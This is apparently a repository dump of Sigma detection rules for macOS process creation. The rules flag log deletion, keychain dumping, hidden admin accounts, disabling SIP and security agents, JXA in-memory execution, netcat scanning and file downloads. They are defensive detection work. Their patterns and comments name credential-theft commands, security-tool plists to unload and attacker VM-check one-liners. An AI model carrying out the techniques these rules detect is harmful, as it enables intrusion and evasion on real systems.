    "content": "title: Indicator Removal on Host - Clear Mac System Logs\nid: acf61bd8-d814-4272-81f0-a7a269aa69aa\nstatus: test\ndescription: Detects deletion of local audit logs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\nauthor: remotephone, oscd.community\ndate: 2020-10-11\nmodified: 2022-09-16\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        Image|endswith:\n            - '/rm'\n            - '/unlink'\n            - '/shred'\n    selection_cli_1:\n        CommandLine|contains: '/var/log'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Logs/'\n    condition: selection1 and 1 of selection_cli*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml",
    "content": "title: Clipboard Data Collection Via OSAScript\nid: 7794fa3c-edea-4cff-bec7-267dd4770fd7\nrelated:\n    - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\n      type: derived\nstatus: test\ndescription: Detects possible collection of data from the clipboard via execution of the osascript binary\nreferences:\n    - https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.t1115\n    - attack.t1059.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osascript'\n            - ' -e '\n            - 'clipboard'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_create_account.yml",
    "content": "title: Creation Of A Local User Account\nid: 51719bf5-e4fd-4e44-8ba8-b830e7ac0731\nstatus: test\ndescription: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2023-02-18\ntags:\n    - attack.t1136.001\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_dscl:\n        Image|endswith: '/dscl'\n        CommandLine|contains: 'create'\n    selection_sysadminctl:\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains: 'addUser'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml",
    "content": "title: Hidden User Creation\nid: b22a5b36-2431-493a-8be1-0bae56c28ef3\nstatus: test\ndescription: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-10\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    dscl_create:\n        Image|endswith: '/dscl'\n        CommandLine|contains: 'create'\n    id_below_500:\n        CommandLine|contains: UniqueID\n        CommandLine|re: '([0-9]|[1-9][0-9]|[1-4][0-9]{2})'\n    ishidden_option_declaration:\n        CommandLine|contains: 'IsHidden'\n    ishidden_option_confirmation:\n        CommandLine|contains:\n            - 'true'\n            - 'yes'\n            - '1'\n    condition: dscl_create and id_below_500 or dscl_create and (ishidden_option_declaration and ishidden_option_confirmation)\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml",
    "content": "title: Credentials from Password Stores - Keychain\nid: b120b587-a4c2-4b94-875d-99c9807d6955\nstatus: test\ndescription: Detects passwords dumps from Keychain\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md\n    - https://gist.github.com/Capybara/6228955\nauthor: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1555.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection1:\n        Image: '/usr/bin/security'\n        CommandLine|contains:\n            - 'find-certificate'\n            - ' export '\n    selection2:\n        CommandLine|contains:\n            - ' dump-keychain '\n            - ' login-keychain '\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml",
    "content": "title: System Integrity Protection (SIP) Disabled\nid: 3603f18a-ec15-43a1-9af2-d196c8a7fec6\nstatus: test\ndescription: |\n    Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.\nreferences:\n    - https://ss64.com/osx/csrutil.html\n    - https://objective-see.org/blog/blog_0x6D.html\n    - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\n    - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: behavior_processes:\"csrutil status\" p:5+ type:mac\n    selection:\n        Image|endswith: '/csrutil'\n        CommandLine|contains: 'disable'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_csrutil_status.yml",
    "content": "title: System Integrity Protection (SIP) Enumeration\nid: 53821412-17b0-4147-ade0-14faae67d54b\nstatus: test\ndescription: |\n    Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.\nreferences:\n    - https://ss64.com/osx/csrutil.html\n    - https://objective-see.org/blog/blog_0x6D.html\n    - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\n    - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: behavior_processes:\"csrutil status\" p:5+ type:mac\n    selection:\n        Image|endswith: '/csrutil'\n        CommandLine|contains: 'status'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml",
    "content": "title: Disable Security Tools\nid: ff39f1a6-84ac-476f-a1af-37fcdf53d7c0\nstatus: test\ndescription: Detects disabling security tools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    launchctl_unload:\n        Image: '/bin/launchctl'\n        CommandLine|contains: 'unload'\n    security_plists:\n        CommandLine|contains:\n            - 'com.objective-see.lulu.plist'                     # Objective-See firewall management utility\n            - 'com.objective-see.blockblock.plist'               # Objective-See persistence locations watcher/blocker\n            - 'com.google.santad.plist'                          # google santa\n            - 'com.carbonblack.defense.daemon.plist'             # carbon black\n            - 'com.carbonblack.daemon.plist'                     # carbon black\n            - 'at.obdev.littlesnitchd.plist'                     # Objective Development Software firewall management utility\n            - 'com.tenablesecurity.nessusagent.plist'            # Tenable Nessus\n            - 'com.opendns.osx.RoamingClientConfigUpdater.plist' # OpenDNS Umbrella\n            - 'com.crowdstrike.falcond.plist'                    # Crowdstrike Falcon\n            - 'com.crowdstrike.userdaemon.plist'                 # Crowdstrike Falcon\n            - 'osquery'                                          # facebook osquery\n            - 'filebeat'                                         # elastic log file shipper\n            - 'auditbeat'                                        # elastic auditing agent/log shipper\n            - 'packetbeat'                                       # elastic network logger/shipper\n            - 'td-agent'                                         # fluentd log shipper\n    disable_gatekeeper:\n        Image: '/usr/sbin/spctl'\n        CommandLine|contains: 'disable'\n    condition: (launchctl_unload and security_plists) or disable_gatekeeper\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via Dscl\nid: b743623c-2776-40e0-87b1-682b975d0ca5\nrelated:\n    - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\n      type: obsolete\nstatus: test\ndescription: Detects attempts to create and add an account to the admin group via \"dscl\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos\n    - https://ss64.com/osx/dscl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection: # adds to admin group\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - ' -append '\n            - ' /Groups/admin '\n            - ' GroupMembership '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via DseditGroup\nid: 5d0fdb62-f225-42fb-8402-3dfe64da468a\nstatus: test\ndescription: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos\n    - https://ss64.com/osx/dseditgroup.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-08-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/dseditgroup'\n        CommandLine|contains|all:\n            - ' -o edit ' # edit operation\n            - ' -a ' # username\n            - ' -t user'\n            - 'admin' # Group name\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml",
    "content": "title: Root Account Enable Via Dsenableroot\nid: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11\nstatus: test\ndescription: Detects attempts to enable the root account via \"dsenableroot\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml\n    - https://ss64.com/osx/dsenableroot.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-08-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.t1078.001\n    - attack.t1078.003\n    - attack.initial-access\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/dsenableroot'\n    filter_main_disable:\n        CommandLine|contains: ' -d '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml",
    "content": "title: File and Directory Discovery - MacOS\nid: 089dbdf6-b960-4bcc-90e3-ffc3480c20f6\nstatus: test\ndescription: Detects usage of system utilities to discover files and directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-25\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    select_file_with_asterisk:\n        Image: '/usr/bin/file'\n        CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline\n    select_recursive_ls:\n        Image: '/bin/ls'\n        CommandLine|contains: '-R'\n    select_find_execution:\n        Image: '/usr/bin/find'\n    select_mdfind_execution:\n        Image: '/usr/bin/mdfind'\n    select_tree_execution|endswith:\n        Image: '/tree'\n    condition: 1 of select*\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml",
    "content": "title: Credentials In Files\nid: 53b1b378-9b06-4992-b972-dde6e423d2b4\nstatus: test\ndescription: Detecting attempts to extract passwords with grep and laZagne\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        Image|endswith: '/grep'\n        CommandLine|contains: 'password'\n    selection2:\n        CommandLine|contains: 'laZagne'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml",
    "content": "title: GUI Input Capture - macOS\nid: 60f1ce20-484e-41bd-85f4-ac4afec2c541\nstatus: test\ndescription: Detects attempts to use system dialog prompts to capture user credentials\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md\n    - https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/\nauthor: remotephone, oscd.community\ndate: 2020-10-13\nmodified: 2025-12-05\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '/osascript'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - '-e'\n            - 'display'\n            - 'dialog'\n            - 'answer'\n    selection_cli_2:\n        CommandLine|contains:\n            - 'admin'\n            - 'administrator'\n            - 'authenticate'\n            - 'authentication'\n            - 'credentials'\n            - 'pass'\n            - 'password'\n            - 'unlock'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration tools and activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml",
    "content": "title: Disk Image Creation Via Hdiutil - MacOS\nid: 1cf98dc2-fcb0-47c9-8aea-654c9284d1ae\nstatus: test\ndescription: Detects the execution of the hdiutil utility in order to create a disk image.\nreferences:\n    - https://www.loobins.io/binaries/hdiutil/\n    - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/\n    - https://ss64.com/mac/hdiutil.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-10\ntags:\n    - attack.exfiltration\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: /hdiutil\n        CommandLine|contains: 'create'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of hdiutil by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml",
    "content": "title: Disk Image Mounting Via Hdiutil - MacOS\nid: bf241472-f014-4f01-a869-96f99330ca8c\nstatus: test\ndescription: Detects the execution of the hdiutil utility in order to mount disk images.\nreferences:\n    - https://www.loobins.io/binaries/hdiutil/\n    - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/\n    - https://ss64.com/mac/hdiutil.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-10\ntags:\n    - attack.initial-access\n    - attack.collection\n    - attack.t1566.001\n    - attack.t1560.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: /hdiutil\n        CommandLine|contains:\n            - 'attach '\n            - 'mount '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of hdiutil by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml",
    "content": "title: Suspicious Installer Package Child Process\nid: e0cfaecd-602d-41af-988d-f6ccebb2af26\nstatus: test\ndescription: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters\nreferences:\n    - https://redcanary.com/blog/clipping-silver-sparrows-wings/\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.t1059\n    - attack.t1059.007\n    - attack.t1071\n    - attack.t1071.001\n    - attack.execution\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_installer:\n        ParentImage|endswith:\n            - '/package_script_service'\n            - '/installer'\n        Image|endswith:\n            - '/sh'\n            - '/bash'\n            - '/dash'\n            - '/python'\n            - '/ruby'\n            - '/perl'\n            - '/php'\n            - '/javascript'\n            - '/osascript'\n            - '/tclsh'\n            - '/curl'\n            - '/wget'\n        CommandLine|contains:\n            - 'preinstall'\n            - 'postinstall'\n    condition: selection_installer\nfalsepositives:\n    - Legitimate software uses the scripts (preinstall, postinstall)\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml",
    "content": "title: System Information Discovery Using Ioreg\nid: 2d5e7a8b-f484-4a24-945d-7f0efd52eab0\nstatus: test\ndescription: |\n    Detects the use of \"ioreg\" which will show I/O Kit registry information.\n    This process is used for system information discovery.\n    It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.\nreferences:\n    - https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior\n    - https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior\n    - https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior\n    - https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\nmodified: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # Examples:\n    #   /bin/bash /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l\n    #   /usr/sbin/ioreg ioreg -rd1 -w0 -c AppleAHCIDiskDriver\n    #   /bin/bash /bin/sh -c ioreg -l | grep -e 'USB Vendor Name'\n    #   ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \\\"\\\\\\\"\\\"); printf(\\\"%s\\\", line[4]); }\n    selection_img:\n        - Image|endswith: '/ioreg'\n        - CommandLine|contains: 'ioreg'\n    selection_cmd1:\n        CommandLine|contains:\n            - '-l'\n            - '-c'\n    selection_cmd2:\n        CommandLine|contains:\n            - 'AppleAHCIDiskDriver'\n            - 'IOPlatformExpertDevice'\n            - 'Oracle'\n            - 'Parallels'\n            - 'USB Vendor Name'\n            - 'VirtualBox'\n            - 'VMware'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml",
    "content": "title: JAMF MDM Potential Suspicious Child Process\nid: 2316929c-01aa-438c-970f-099145ab1ee6\nstatus: test\ndescription: Detects potential suspicious child processes of \"jamf\". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.\nreferences:\n    - https://github.com/MythicAgents/typhon/\n    - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf\n    - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-22\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith: '/jamf'\n        Image|endswith:\n            # Note: Add additional binaries/commands that are uncommon during your typical admin usage of Jamf\n            - '/bash'\n            - '/sh'\n    condition: selection\nfalsepositives:\n    - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_jamf_usage.yml",
    "content": "title: JAMF MDM Execution\nid: be2e3a5c-9cc7-4d02-842a-68e9cb26ec49\nstatus: test\ndescription: |\n    Detects execution of the \"jamf\" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.\nreferences:\n    - https://github.com/MythicAgents/typhon/\n    - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf\n    - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nauthor: Jay Pandit\ndate: 2023-08-22\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/jamf'\n        CommandLine|contains:\n            # Note: add or remove commands according to your policy\n            - 'createAccount'\n            - 'manage'\n            - 'removeFramework'\n            - 'removeMdmProfile'\n            - 'resetPassword'\n            - 'setComputerName'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the JAMF CLI tool by IT support and administrators\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml",
    "content": "title: JXA In-memory Execution Via OSAScript\nid: f1408a58-0e94-4165-b80a-da9f96cf6fc3\nrelated:\n    - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\n      type: derived\nstatus: test\ndescription: Detects possible malicious execution of JXA in-memory via OSAScript\nreferences:\n    - https://redcanary.com/blog/applescript/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.t1059.002\n    - attack.t1059.007\n    - attack.execution\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_main:\n        CommandLine|contains|all:\n            - 'osascript'\n            - ' -e '\n            - 'eval'\n            - 'NSData.dataWithContentsOfURL'\n    selection_js:\n        - CommandLine|contains|all:\n              - ' -l '\n              - 'JavaScript'\n        - CommandLine|contains: '.js'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml",
    "content": "title: Launch Agent/Daemon Execution Via Launchctl\nid: ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e\nstatus: test\ndescription: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md\n    - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\n    - https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\n    - https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html\n    - https://www.loobins.io/binaries/launchctl/\nauthor: Pratinav Chandra\ndate: 2024-05-13\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1569.001\n    - attack.t1543.001\n    - attack.t1543.004\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/launchctl'\n        CommandLine|contains:\n            - 'submit'\n            - 'load'\n            - 'start'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_local_account.yml",
    "content": "title: Local System Accounts Discovery - MacOs\nid: ddf36b67-e872-4507-ab2e-46bda21b842c\nstatus: test\ndescription: Detects enumeration of local systeam accounts on MacOS\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - 'list'\n            - '/users'\n    selection_2:\n        Image|endswith: '/dscacheutil'\n        CommandLine|contains|all:\n            - '-q'\n            - 'user'\n    selection_3:\n        CommandLine|contains: '''x:0:'''\n    selection_4:\n        Image|endswith: '/cat'\n        CommandLine|contains:\n            - '/etc/passwd'\n            - '/etc/sudoers'\n    selection_5:\n        Image|endswith: '/id'\n    selection_6:\n        Image|endswith: '/lsof'\n        CommandLine|contains: '-u'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_local_groups.yml",
    "content": "title: Local Groups Discovery - MacOs\nid: 89bb1f97-c7b9-40e8-b52b-7d6afbd67276\nstatus: test\ndescription: Detects enumeration of local system groups\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-10-11\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/dscacheutil'\n        CommandLine|contains|all:\n            - '-q'\n            - 'group'\n    selection_2:\n        Image|endswith: '/cat'\n        CommandLine|contains: '/etc/group'\n    selection_3:\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - '-list'\n            - '/groups'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml",
    "content": "title: MacOS Network Service Scanning\nid: 84bae5d4-b518-4ae0-b331-6d4afd34d00f\nstatus: test\ndescription: Detects enumeration of local or remote network services.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith:\n            - '/nc'\n            - '/netcat'\n    selection_2:\n        Image|endswith:\n            - '/nmap'\n            - '/telnet'\n    filter:\n        CommandLine|contains: 'l'\n    condition: (selection_1 and not filter) or selection_2\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_network_sniffing.yml",
    "content": "title: Network Sniffing - MacOs\nid: adc9bcc4-c39c-4f6b-a711-1884017bf043\nstatus: test\ndescription: |\n  Detects the usage of tooling to sniff network traffic.\n  An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-14\nmodified: 2022-11-26\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith:\n            - '/tcpdump'\n            - '/tshark'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml",
    "content": "title: File Download Via Nscurl - MacOS\nid: 6d8a7cf1-8085-423b-b87d-7e880faabbdf\nstatus: test\ndescription: Detects the execution of the nscurl utility in order to download files.\nreferences:\n    - https://www.loobins.io/binaries/nscurl/\n    - https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl\n    - https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd\nauthor: Daniel Cortez\ndate: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/nscurl'\n        CommandLine|contains:\n            - '--download '\n            - '--download-directory '\n            - '--output '\n            - '-dir '\n            - '-dl '\n            - '-ld'\n            - '-o '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of nscurl by administrators and users.\nlevel: medium\n"
